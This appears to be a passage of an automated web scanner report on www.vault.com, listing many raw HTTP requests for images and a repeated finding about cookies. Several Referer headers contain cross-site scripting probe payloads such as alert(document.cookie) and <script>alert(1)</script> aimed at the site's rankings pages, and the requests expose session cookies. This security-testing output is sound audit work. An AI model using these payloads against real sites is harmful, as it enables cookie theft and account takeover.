GET /images/employer_section_header.jpg HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.1.10.1295451341; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/favicon.ico HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.3.8.1295451341966; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660; _chartbeat2=1wcinl964s8aejot
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/header_background.jpg HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.1.10.1295451341; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/home/icon-resume.png HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/home/no_flash.jpg HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/homepageFlash/01newjob.jpg HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/com.vault.home.portlets/homepage_flash.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.3.8.1295451341966; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/homepageFlash/02reshelp.jpg HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/com.vault.home.portlets/homepage_flash.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.3.8.1295451341966; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660; _chartbeat2=1wcinl964s8aejot
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/homepageFlash/04coreviews.jpg HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/com.vault.home.portlets/homepage_flash.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.3.8.1295451341966; _chartbeat2=1wcinl964s8aejot; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/homepageFlash/06salary.jpg HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/com.vault.home.portlets/homepage_flash.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.3.8.1295451341966; _chartbeat2=1wcinl964s8aejot; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/homepageFlash/07careerchange.jpg HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/com.vault.home.portlets/homepage_flash.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.3.8.1295451341966; _chartbeat2=1wcinl964s8aejot; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/icons/business-people.jpg HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/icons/cart-green.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.3.8.1295451341966
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/icons/checkbox.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d%22%3E%3Cscript%3Ealert(1)%3C/script%3E5276a27416&rankings=1®ionId=0/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.5.8.1295451341966; _chartbeat2=1wcinl964s8aejot; JSESSIONID=0000PKS73Wmf_IK-VDDZBly2VV1:140i3s34m; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/icons/email-y.png HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d%22%3E%3Cscript%3Ealert(1)%3C/script%3E5276a27416&rankings=1®ionId=0/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; _chartbeat2=1wcinl964s8aejot; JSESSIONID=0000PKS73Wmf_IK-VDDZBly2VV1:140i3s34m; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.6.8.1295451341966; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/icons/email.png HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d%22%3E%3Cscript%3Ealert(1)%3C/script%3E5276a27416&rankings=1®ionId=0/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.5.8.1295451341966; _chartbeat2=1wcinl964s8aejot; JSESSIONID=0000PKS73Wmf_IK-VDDZBly2VV1:140i3s34m; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/icons/featured_company_left_arrow_inactive.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.3.8.1295451341966
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/icons/featured_company_right_arrow_active.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.3.8.1295451341966
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/icons/gold-lock2.jpg HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d%22%3E%3Cscript%3Ealert(1)%3C/script%3E5276a27416&rankings=1®ionId=0/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.5.8.1295451341966; _chartbeat2=1wcinl964s8aejot; JSESSIONID=0000PKS73Wmf_IK-VDDZBly2VV1:140i3s34m; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/icons/join-books.png HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/icons/print-y.png HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d%22%3E%3Cscript%3Ealert(1)%3C/script%3E5276a27416&rankings=1®ionId=0/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; _chartbeat2=1wcinl964s8aejot; JSESSIONID=0000PKS73Wmf_IK-VDDZBly2VV1:140i3s34m; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.6.8.1295451341966; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/icons/print.png HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d%22%3E%3Cscript%3Ealert(1)%3C/script%3E5276a27416&rankings=1®ionId=0/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.5.8.1295451341966; _chartbeat2=1wcinl964s8aejot; JSESSIONID=0000PKS73Wmf_IK-VDDZBly2VV1:140i3s34m; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/icons/share-y.png HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d%22%3E%3Cscript%3Ealert(1)%3C/script%3E5276a27416&rankings=1®ionId=0/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; _chartbeat2=1wcinl964s8aejot; JSESSIONID=0000PKS73Wmf_IK-VDDZBly2VV1:140i3s34m; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.6.8.1295451341966; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/icons/share.png HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d%22%3E%3Cscript%3Ealert(1)%3C/script%3E5276a27416&rankings=1®ionId=0/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.5.8.1295451341966; _chartbeat2=1wcinl964s8aejot; JSESSIONID=0000PKS73Wmf_IK-VDDZBly2VV1:140i3s34m; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/overlay.png HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; JSESSIONID=00000-dJvfxGNM9UrnCQsyBDC18:140gkm3u6; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.4.8.1295451341966; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660; _chartbeat2=1wcinl964s8aejot
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/rankings_tab.jpg HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d%22%3E%3Cscript%3Ealert(1)%3C/script%3E5276a27416&rankings=1®ionId=0/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.5.8.1295451341966; _chartbeat2=1wcinl964s8aejot; JSESSIONID=0000PKS73Wmf_IK-VDDZBly2VV1:140i3s34m; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/search/select-bg.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.3.8.1295451341966
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sections_background.jpg HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d%22%3E%3Cscript%3Ealert(1)%3C/script%3E5276a27416&rankings=1®ionId=0/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; _chartbeat2=1wcinl964s8aejot; JSESSIONID=0000PKS73Wmf_IK-VDDZBly2VV1:140i3s34m; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.6.8.1295451341966
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/spacer.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
